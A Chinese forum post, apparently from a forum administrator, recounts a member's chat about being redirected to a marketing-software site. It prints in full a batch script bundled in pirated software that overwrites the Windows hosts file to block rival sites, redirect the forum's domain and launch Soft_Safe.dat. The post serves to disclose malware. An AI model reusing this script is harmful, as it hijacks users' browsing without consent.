今天管理员收到一位论坛会员的反馈,大概过程就是打开吾爱破解论坛被劫持跳转到一个营销软件站点,会员曾经在这个站点上下载过软件并执行,之后就不能正常访问了,原因就是host被垃圾软件修改了,还好360安全浏览器给出了正确的提醒。
具体的聊天记录如下:
回忆不抵流年━- 19:40:53
在吗
你的站打不开
打开的却是这个站
www.xfyxz.com
回忆不抵流年━- 19:42:43
�Hmily 20:27:10
host被改了
你弄的是什么软件成这样了?
回忆不抵流年━- 20:27:27
就他们站的软件
�Hmily 20:27:28
从吾爱下的?
回忆不抵流年━- 20:27:31
不是
www.xfyxz.com
这个站上的
一点就屏了
�Hmily 20:29:47
光打开不会中木马的
你得把host改掉
知道怎么该吗?
发远程
我帮你弄下
回忆不抵流年━- 20:30:02
会
不是、
、
我是打开他们的软件
�Hmily 20:30:22
把软件发我
回忆不抵流年━- 20:30:43
我现在删了
我找找给你
以前用过很多 他们的软件都 是HOST了 你们的打不开
今天打开他这个 却发现 点你们站 出现他们的站了
�Hmily 20:31:38
真牛逼
回忆不抵流年━- 20:32:10
他们很厉害吧
�Hmily 20:32:20
不是厉害,是傻逼
成功接收文件“1.rar”(3.43MB)
打开文件 打开所在文件夹
回忆不抵流年━- 20:33:46
现在搞软件的 就他站不厚道 一点软件还弹他站
看了下对方的站点,上面还有联系QQ,所以联系了下,反馈如下:
分析了下木马,在所有盗版软件里捆绑了一个批处理来修改host,内容如下:
attrib -R +A C:\windows\system32\drivers\etc\hosts
@echo off
cls
echo 127.0.0.1 localhost>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 etone.86372.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.topyingxiao.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.178yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.52pjz.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.52pojie.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.5zkc.cn>>%systemroot%\system32\drivers\etc\hosts
echo 113.10.149.145 www.52pojie.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.pojie8.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.loveji.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.hctcj.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.jsssz.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.etonesoft.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lanmao2010.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.jfw888.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.xm930.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.vip029.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.94061793.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.6688yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.xuexi581.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yx990.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.918yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.gollb.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qunfaruanjian007.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.999yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.diandianfa.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.54sr.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.xywaz.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.99yxrj.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qisefeng.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.down60.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yx0225.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.328yxsoft.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.ch2007.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.jueaivip.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.wxyingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.seofafa.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.21vk.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yingxiaoruanjian.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.goodun.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.smoke08.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 vunseo.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.vunseo.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.pj8.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 pj8.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 jueaivip.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.jueaivip.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 topyingxiao.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 6688yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 52pjz.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 lanmao2010.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 xuexi581.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 918yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 xm930.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 94061793.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 178yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 qisefeng.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 pojie8.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qunfa.so>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.shuanglaba.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.hzyxtl.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.schkj.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.cnyingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.591ppp.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.hn911.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.wwqunfa.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.jgrjj.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.vip029.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.taoxin5.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qq520.cc>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.5588yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qqqunfa.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.chinapjz.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qunfaw.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.only-3.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 hctcj.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.u68688.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.down60.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 u68688.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 pjrjyxw.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.pjrjyxw.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.21vk.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.haodisoft.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qqsender.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.shunfa365.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qunfa555.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.daysay.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lantqf.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.11ruanjian.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qqjiaqun.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.east1688.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.diandianfa.net>>%systemroot%\system32\drivers\etc\hosts
echo 113.10.149.145 www.li0107.com>>%systemroot%\system32\drivers\etc\hosts
echo 113.10.149.145 li0107.com>>%systemroot%\system32\drivers\etc\hosts
echo 113.10.149.145 www.huacolor.com>>%systemroot%\system32\drivers\etc\hosts
echo 113.10.149.145 bbs.huacolor.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 service.suomali.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.suomali.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 services.suomali.net>>%systemroot%\system32\drivers\etc\hosts
attrib +R -A C:\windows\system32\drivers\etc\hosts
ping -n 2 127.0.0.1 >nul
start Soft_Safe.dat
exit
| 
[复制链接]
